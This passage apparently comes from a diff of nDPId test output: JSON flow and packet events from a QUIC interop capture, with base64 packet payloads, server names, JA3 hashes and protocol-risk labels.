+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1603816434599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434599,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8YxAAEAREMXAqAGAR8opqZMdEVEE7ChGywoKCgoIqaWx\/UJ+JLQAAETSRegWnRcPLKk7uYLS8VZ6A+zIwJb1mPqvy2MKL3Tt2jbz4sn5hDNSysWyy0Q1vrUZJyUEmOGV1jj\/0B2GZUMMnU+bx4P64TDztfWRCEsX9xqURkrteqGz6ltOPoTMK6uGDuQl8788DuRU6AkQ1v9y\/IX5DuObM3NrRxVsTfrPVsxKWrlvhhc8+bzP4RcGvyJ\/YYHHHWv8RiMZV8ZiNqzD\/Tz+RFWP04TpQ4H0wJGgAkCU7iYd4ab1bDvSCbzjD468MBlMvdV6E9+6rcgmFKBMzQQdE+3VD+cPof5Frq5N6HQby2yYtJudG6NrUX73fAa2KQZnzYR4AbsJmaaX8pjzhRDzDU9lkoPYf4Oc4\/nC0DEA60ezuIdY6ti8wvtU78brnoSIwXQNufJ3MzKMZWZJpg9zM9qPOZYsquFKurbo78k5\/rJeEvIak8OZ1yOE2HfW77PYo2g+KEWaP\/fvQAQmwoeHxVcoRheC4X\/2hnLsZC4VDGWTctTohPZkhIIguZevQcdGStgdNPOoe23oCG+cigtTE2XZqR98GoabuEhLVpX8IFbc399f2Ed3R9zv0BqRW7l9W+VGBCK8l7hYQJcjAGrqb6UxP9n5twWwwy63e4tac05Mv3YxsBf\/gpWY1CeGoH4A3AOIfnYfHjCBkCKDei184tAdAwJXAV8xwNIvdB1dw3Mc68J\/Pfqo1EfLZjZfaNqOe3f8viMQO4rriT8gdNtZ0CgbJJiTTs0v3CCooFyBSmtQOJYSnaqzYT+uTl0hY8Pv7OC+YTEfEJsGmbz3bNDq8LTl15HzHDF6\/S0tKU8O8InGVtk\/4xlinam6Cr3IODbyJ4bhBkIKy8MFcG+qdHGW4VYXvs5ZK3HFwh9xB\/co3gy3WkEyPgUxAVTluIvDqC8K6I1mGrN5z9mmI7+cQWr+bnYAVDEJN4rmkUxjOxyuiiOc+eUaT617fUn1I8bpVOZvNmAr\/m0w4TmV040UAJX8kNuv73I76cuzAXTqPGp1OIlB8p\/rUaLeRtwOv26NjRPMlDjdM\/2\/Ilg8tpUGW7j\/eqU5QmqHo\/Tiz3kNBpIfGMBMuOWA\/+PbBvi4AgIZ5msvRnQ6tvRm+GWBEDzs\/IRYnKTailefoHxjXB0DNFDc4zDa+tiGPQt7PmYE5fk8D2cP4OlLJtPGya0qenuuBZpE+9egccg6vsbROrFnslZRL6+0pFRqbKJZSvkqUbHUrlE\/JfB\/RdVa6sOFQkyGbFLPZtdG76DZnk7EFNB+78rrmYjzs6QdbL0HyurZ1UeWbBWI2fQCt4n30u475\/uIDFvQNfHznThYw1T3lHUvAqHOyJ\/ccQ7CPkJlpFBs41COx+7rd4GKmxiD62jg+b4QoriC8bYd6M7zXH9NxgT2wgi7+ApxeYKupXdFHK42Vnp2KF58erKh\/QyLOmaga5TR43mFPJ1U4Glvlilv1YLFtMnz+s5m3xpG9nXQX\/uLnoR+QzZ7ZpahZpcCH3jpOUBrBQLDS3SRPYGHiIfQ3MTxt\/K2HL9xf8n7chjG+XDpVfD+Ow4ZDOisoboLR0pMTJoCSzc7NiqX5QJC8lHEJcQJ84dLF0V8eZdiDwD0a\/E3DacaQJIW+8v0unPtOxdaQoXsSVsGNysZHm0clQcBwxWaX8rC0w=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00997{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1603816434601,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"ts_msec":1603816434601,"pkt":"PKn0qB\/spJGxgjQ5ht1gCaFmAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVHH8QAfHOHYAAAAAAAIMG1gGePLGT0KGio6\/wAAHQ=="}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1603816434601,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434601,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAQM5AAEARcbfAqAGAjOM0XJOYAbsE7P6myAoKCgoI8EYvtCcjifcAAETSFB6sl\/lkLZ53JqQdlE2I446feeWqsyvCToqdH\/63WgFZXzAd5XJaz2hSlpGEY3otY+eR2fXJeeeLgKjgc1xdXndquYfP60ARoUpa1CNURQDv3dVUcZH4ZRr7gXB5ZoVF7\/jeJ12Vn6muRxM8UUAONwgdRKDgiL0UJP4xo5\/U0EJMBAoIApMkTic7rgG2Bh+mE0INS4tt2YDtZQWRkNwxdusXBvMW5Xh6sJWHpZCpVde45Vj8XrkpX2zzc2M+YhMwcBgNKHixMOLCc1OsZDjp+pVjqtaNwuJrMIuOI6usSTI66JX+7JfjdPq7itf0ZF7lYG6PNEEU+xPizRn2KxsuDnIqtilwE+LUxpsYFKfGcG5ezqqO6yKGneF+EwF1DUUwFWNzaP0yDVP0V7O256HNYYY9PS+2D1mPJ5Qh2m7ZEHCUVkRSNQ2ShIsxlvawRDyCp6kGwT\/WLvCLzHx+eyBaO007Tt\/wxiyopmu\/PGttRCmy1mbey1xkep6SVHg2hljMI2kKhPkHRByGHf4LjQ5nMnAXf0Tq9kl8M9jkU3GAPVgFzvq3cQiBPTdYAx\/xzWiHb6MZotlQJrKtj8r5btIK5VkYbo4NO\/HZLmSzj+v2qCIKxc1Kk9zuPTC3cbP50XiuLwGkNCPCfW+6OO5M9kmhEpBXsPSz70fHx0\/0D2eDDtF18PM3Frvb1Fy16GhVoNeVMEwWNkS3FwumWjt1NyRbw4LvKt\/Rmj6KQiUZvu7MbT1ndIcWoPm+a9vrINvQyHbJftHfdf2llfXEA9XL2i2KvpzX8iugx8h\/EwmNNUg0F+x1PWifXySR9l8Caxeyeh8E9jH293IxSPPA935LAymnnfgPtyfd1UPNS9YuR73IJfEhrnUAjx6P8XPDbcP+xgeY76YS+U3MH7XP1Q4EtbU2P0qKkUuklKbSr5dA\/KAEw+eLuqUjqAIZj+rndafIhO\/LsQfPYOW7bdEx4iMsGisRcOkkgcehuB399WIzJNDaiUudf5GjJuMlrlW6TLhJ\/g11dD2dIjh8WIkp4Qn0ZkpnSlcQsZ6BaomyP1UZMobw7Gb2Mj8fiVHGtut5pXwWsRBQRFeBEEDjwKjkFEFJa+NTqaiorO29xYtpR57ookqNhP\/dfrYv88CXL7XheZvTVIEYcH\/93v+Cx7XpZlqq9qM40K8mUb2GtWK8vMCP6sNaXS5hLGz84Ddirh9wD6+wfnjrttIpQkYIn\/n0QN2b1TKqZ4lV4cVP\/FewN5U4p+laZISTDvXTwJ40b2O71mGyXFIkSolo8eu55u2aHixwNCDhO56mWWHK4Sjf79khIgUIR39vcpUSQ6FVfGU5puW13EEw+81VUTMmbCdmBMwZ08nDTbGTXvAz8fOGdlwm11FF6ZM3uLiRXp1gGZjK30iogDlgUho8fiLM4+4Funma+wzaEJShb\/ISV4iTPJc+5A6A\/ef2opV+jxdSnTVcIVgMqB\/J2pk14MFTuYdq1mbrGXTX4\/KzcWcwz8+SNndOIz9Wc7K5XCuPKwn0ey2jndDMY01z6moJcN3uM0nJF8eHMcSe6+CbejSVpzM5ThvLdtFQ+ViAhGrDwX9+mUtbkulWDQiHIxtnNa+G+LGQ1ouuwgszH64VBoxich6WLV\/F59MlHS\/lRQ=="}
-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00640{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1603816434602,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434602,"pkt":"pJGxgjQ5PKn0qB\/sht1gCm9\/BNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmd7jcRUQTYoyXJCgoKCggXpMPD7IbgFwAARL6WX\/ntaXcB2j6uyN\/eyiy9Z65LFFuHMHqjLQFwZXwPmrbwF1D9AvrfhiGZgRDKOtshDVcv\/5o63Mt5lp96z15M3u52GksY8IeFOYZFLzRLSypCHdSUAudS4QYS9yvJF11P6aEq9v5\/cYDKzMAnbW\/\/2YzVVKyxaNwCoqy+9J2FpElrzMoylxHY8jGmzsLZt+Cq4S6W5A\/yie2rgPdsV\/\/kadibCJuYe2QgLqw+NgOvs3ZCW318tssCX9NeufGXtdg+E7g9jwjM+K4Ord93OwDnRF2aTJmHo2tCEGjCWFEkbK0aHLxzz+KabEo0\/LETVbiLPpKC44rKQXGCZ7Lmqskpi4aWMEcEh2AyNzzT6UX+VTMz2bzdgqFYxEdMOkTF8mZvPnsAyl5GsftpRvrRDq4JM2HS2xjqKNf8\/rk9IDD2z1lCuhYklz6u8Xh8AV2CVmPjku7CduxRqf8iWhU3IZh\/tB0Zovqp1ibQbIYt4zrU3MxUs0Ann688P+rb7y+ZsnFu\/fk+h6xbT\/viYivE\/uJYhISmd0y\/Ibw7oVkhUvcwYGe6BlxHbu9DCl0q2k0qM2EbRuJ7WjnFFIsOxPhC8cKRdPoM0zznMb98kz5ysAdYKg+SkdeKd+4pa4gn+PgKnZ1v9QHbHVyu18amv\/ydgTDP9BOE5otsm9Ste64D+uoB3LV0jr7gSVBlTP43OHoBDZrEnIZWNb0IXAfnfRqK5U1mX9jYgyrjMmaabtaW5SNCjpVcHvLrXXfdvgnhoksaNA8gqrNxl8kTwyqsCW0T9SKJrw9GgmLUZOOEXkBCdtDC8Rwy2m5YGCQMlqBCp9fcD7R7OWZl9re2KtmbZcx5XuRoJK+Ee\/RcP8U39Qot\/kENeJ0xwBwp0WES98qMbpvwX+NXwrulmff5OZz7s0aOup6\/XRoJevNt6uaC\/AmTv08qFISr1ifH4eiMCq2kmxW2ahH9hEVWZR3Jxv9iJSCKrtvEkXwyQlIE2Ox6SYeipj2kQe7zZek+5dXGQsbScMIja5ekSaVy1D8rj1LjvpGiPeJY1UasRXnpVF59+PQLwsfANope5yQlCx+YVECOLk0\/GMBEoIlKIoZLqVJG\/C0u7wyX+2E6ZdHmRDFkH6mFBgjUTGXKtzBCjRac0BnMVz9YKLNQsd+\/rrsH5pxJ9YO0MuiSwIPs+xpIdo\/IEERboBN3aoJgydQ37ceY80ila+nQ3U9dSxR06jfC77UBEfVmdzlkuL\/DhQFWPNRfInKTTvG3yav2KKHl1x8TO6Ii\/6UZ\/zxT\/dSPlF2U3u1lI3XWOna6XPE0cHG4jVhbs8Y9WhQwEhQEXLQePEz9F2uVXMGjij63Ico7971IAKm6HyBzRv2Z2ImKjQZ0Rn1bzFvrV1KmJeslV3i9\/gn2wrszpq9ZZiQligWna9g2XDzA9fJDQnnBdg+QtaCieo2h4UjfZlagVCzJE5jJiKvMJjSG+vhOBRM\/pLtSq8qtMvvY3qHtTPn5\/9+fdA0SINWbW8xs11auU+NEYm5CyZ4WhnBvSSN8gec+a6gg9j80lhWWSEnL5q+wUaDeIovDUJ\/pMAff2X2gN+lfmO\/YkWJGLKHp\/WpzMbzWOkNBwTL8XEECXXPg9Q=="}
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1603816434606,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434606,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwbNAAEAR5fDAqAGAwb4KYsH6AbsE7KsqzQoKCgoIc5O0PcfI+J8AAETS5F5\/qillFB34ZBYonPftxqjX8kBkyIk23lkZ2qSswRv0KEUWFyy4088Os3ZnRrOQrOwaYeXZhHaUBeXrptUSJZkTrnEJcyoWV9p6dEfGmv7bCjVxnlCwVoAAaJG8GHsjcbwBPQJPZ6oZM5lf6cBUHAqYHNw6rDSUKD3xvkDAy0tLs96F9A7S0NsDa6ZvGzs91gfUUlnKUaJulVEVfMWbhAjpxgUG+FXt9Oo9sL+OPkMVV\/7Vt0yoW1XaITbIq8KI8LwQAzQXNX+v7kBeFwKwuJRDs2d2j85QUWSVVg6OehxN0oTkJ\/iEWaH7HwRGKNP3wBEMihP+3wB41yI1iprDNfCK26psAUg8WkevVXjHCw\/1R8rXTAqTx4QwA+k906j11b35dxI9YbrIjP9IU\/OcLYQFjdfqfddeEH8L8+SaTdDj+FCEgqbdUYwvn3ShJJ8oqSXEByw1fDw6a6R8YQY\/NcWHQmWlwZV\/s8V6pCK5XJBFoyooYlTtK5HT3AzggQdsGSXTc5vPgI9QOgVcbjbdWp2Amvc9V\/q1oTUYUqgUbgO29365V32Dune0xvsiGBLhkxW\/xB2VR3VD8bIGBOkyav0B7u323dLTivvutQgLSxIpoC002ajbvnwVNbm1ZcAbWyBNcs3+OXM\/vE9S84TFCziB6d7oYbaE4yI6WoMFbiyLE0HiXUYenUnbBg82zVNaZ30wtH7\/mEwwYXBlHw79PgUwLtAbNWwFraM3BZwEm3JyH67VIsyLo7T55Cx3r9oakgfDnsS6P4bT5c4dkQ6l8BLSFIYKSUtqpqBbExMHSrqaMXKXu8BL\/5ieVLJhNsi\/slQ9w5NDtQoTTbDkDU1uXliwiII\/d1kCgsYupKOqyL1yOQzPZKCInlHZsUbMdJ7y8bMnF2vGBX4GG5L01jtQDpBD38uCXLmnzO+9c3yuX3Qh5zcfT34vJRSeWP4va7S\/nOP4nZYATnqlIGSv\/xJzfLmDB79k6IefwfU2xRise5mIw2N37hs+9xRHmkwSbEY658tuxL8Xb1MtKxUQDPq8BcSvLe9eQOWinR94+9pJhj3IXfg8WmTW3\/5K+B\/rN2gnFxD27OZ+9NCOJP8NZ6N\/BTFtZSfdJJpZYHIN8TnZLxRlID54H\/GDdCUsJNUfhoKrsuqdCGDfNktOUx0MVrR62a0uRztIF8liJfUeO\/\/KAKR5QW14obLuVSayoUimbOEHLMJCVQc8\/yVQYizs3KLKMpIRLych5r0TNMP6kwhIq3oRLx1tuGXR5Ce8Ty5Ru0TOGnc5fQ50Lqs6GkZSf0wsPD2nX6txa8FkQa+B66L7AJOYLxiX+7eCvInUvChFc+0Sb+WrPE+4s+jAEcZnUDM2coA7EAkqHnQ9J+lIjWQPxMKhSjx58dKOyLuMftDrpApD9cIaKdSgopyq44a5UIqEi1D2XHwo6tGidN7YNyIAutBBxF5IsroY6pOfcfi2fwuYnSzbutfHvCf8YirR\/BAaLMu3aNHHB\/ZKPVZpI\/gucAgFFvFH\/M+\/qty4rxYviGGCAa3\/53kY+NHOxljIVMDVyWE9T\/sqE0XTooS\/SgQ38mqYWA+WDPfMqjhyITNqp6FmsU\/gt0JrpoezFzEe61zJNnCelVJXtRUHkhDcxRW2fFs7Rw=="}
-00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1603816434606,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434606,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUATrtAAEARiKTAqAGAg58YxqJzEVEE7I\/AwQoKCgoICpCmEqV\/5+UAAETSrUzMAXsH+lNXSQbnFrAyl7ceSEtrPkuYxRTLDdaFiiLmduk9Xs2lXgYzbsBek6Ac79LMu0h2S0VMLhMIoynub2oycJvB5K8wYKEeSkLlTvDrT+4\/PAaXju5wh72tiJmArJiM37yh+0ZsoHgCUSqF0WzYygVii9e2gqRAE3tVIHQjG+5jZMLcaJ2yFfHfBMxd\/O6jX\/qLUotOaY1vFKrUIY90\/U9Dbi4MsFuL6Z4A02fTqtuX4r21R2SazEf5RJES7hcKSmvCokMZmOKlyLilXCKYcenmZhN8UNa3xfFEIcmY5JwTnC3sMsOo\/rBS\/9H1GO4ZE3+cPgE5zkXgqeuWBcFKNYDy7D\/WFSz1wdWlgFLSW2hrnDFcjH74QFpHFNYSLfoZVnrmXaJWdYqR3\/GrunzyfQ5NLPD0xfrMvW+mfxDdvmFWlM5+TRdKLnFtqU5+MG9orjbkU4chKQtFPiEcFOtk8NTHDHAGDTwbYffqe87exnYOpkIf3ZSAN+Xc6uclNDmRl6vRFeIZ